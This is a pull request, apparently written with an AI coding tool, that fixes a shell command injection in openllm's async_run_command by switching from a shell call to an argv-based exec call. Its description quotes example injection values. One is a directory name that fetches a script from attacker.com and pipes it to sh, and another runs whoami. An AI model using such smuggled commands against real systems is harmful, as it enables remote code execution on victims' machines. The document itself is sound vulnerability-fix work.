### PR TITLE
fix(security): use exec instead of shell in async_run_command (CWE-78)

### DIFF
--- a/src/openllm/common.py
+++ b/src/openllm/common.py
@@ -429,11 +429,7 @@ async def async_run_command(
     # arbitrary commands (CWE-78). This mirrors the list-based, shell-free
     # ``subprocess.run`` used by the synchronous ``run_command`` above.
     proc = await asyncio.create_subprocess_exec(
-      *cmd,
-      stdout=asyncio.subprocess.PIPE,
-      stderr=asyncio.subprocess.PIPE,
-      cwd=cwd,
-      env=env,
+      *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, cwd=cwd, env=env
     )
     yield proc
   except subprocess.CalledProcessError:

--- a/src/openllm/common.py
+++ b/src/openllm/common.py
@@ -422,8 +422,14 @@ async def async_run_command(
 
   proc = None
   try:
-    proc = await asyncio.create_subprocess_shell(
-      ' '.join(map(str, cmd)),
+    # Use exec (argv list) rather than shell to avoid interpreting shell
+    # metacharacters in command arguments. Values such as ``bentoml_tag`` are
+    # derived from cloned-repository directory names, so a directory named with
+    # shell metacharacters (``;``, ``$()``, `` ` ``) would otherwise execute
+    # arbitrary commands (CWE-78). This mirrors the list-based, shell-free
+    # ``subprocess.run`` used by the synchronous ``run_command`` above.
+    proc = await asyncio.create_subprocess_exec(
+      *cmd,
       stdout=asyncio.subprocess.PIPE,
       stderr=asyncio.subprocess.PIPE,
       cwd=cwd,


### PR DESCRIPTION
## Summary

Fixes #1229 — an OS command injection (CWE-78) in `async_run_command`.

`async_run_command` (in `src/openllm/common.py`) launches model servers with:

```python
proc = await asyncio.create_subprocess_shell(
    ' '.join(map(str, cmd)),
    ...
)
```

The argv list is joined into a single string and handed to a **shell**. One of the tokens is `bento.bentoml_tag`, defined as:

```python
return f'{self.path.parent.name}:{self.path.name}'
```

`self.path` points at a model-version directory inside a **cloned model repository**, and neither the model-name nor version directory name is sanitized or quoted. A repository whose directory is named with shell metacharacters — e.g. `1.0;curl${IFS}attacker.com/x.sh|sh;echo` — is then split by the shell into multiple commands, so `openllm run` / `openllm serve` against an attacker-controlled repo executes arbitrary commands on the victim's machine.

## Fix

Switch the async path from `create_subprocess_shell(' '.join(cmd))` to `create_subprocess_exec(*cmd)`. `exec` passes the argv list straight to the OS with **no shell**, so metacharacters in a directory name stay literal argument tokens instead of being interpreted.

This mirrors the synchronous `run_command` in the same module, which is already safe because it uses the list form `subprocess.run(cmd, ...)` (no `shell=True`). Legitimate commands are always plain argv lists (`['bentoml', 'serve', tag, ...]`, later rewritten to `[python, '-m', 'bentoml', ...]`), so there is no behavior change — only the shell interpretation layer is removed.

## Verification

- `cmd` is already normalized to `list[str]` earlier in the function (`cmd = [str(c) for c in cmd]`), and the `bentoml`/`python` rewrites keep it a proper argv list, so `*cmd` unpacks cleanly into `create_subprocess_exec`.
- No pipes, redirects, env-var expansion, or other shell features are used by the constructed commands, so `exec` is a drop-in replacement.
- After the change, a tag such as `evilmodel:1.0;whoami>pwned;echo` is passed as a single literal argv token to `bentoml serve` (which rejects it as an invalid tag) instead of being executed.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
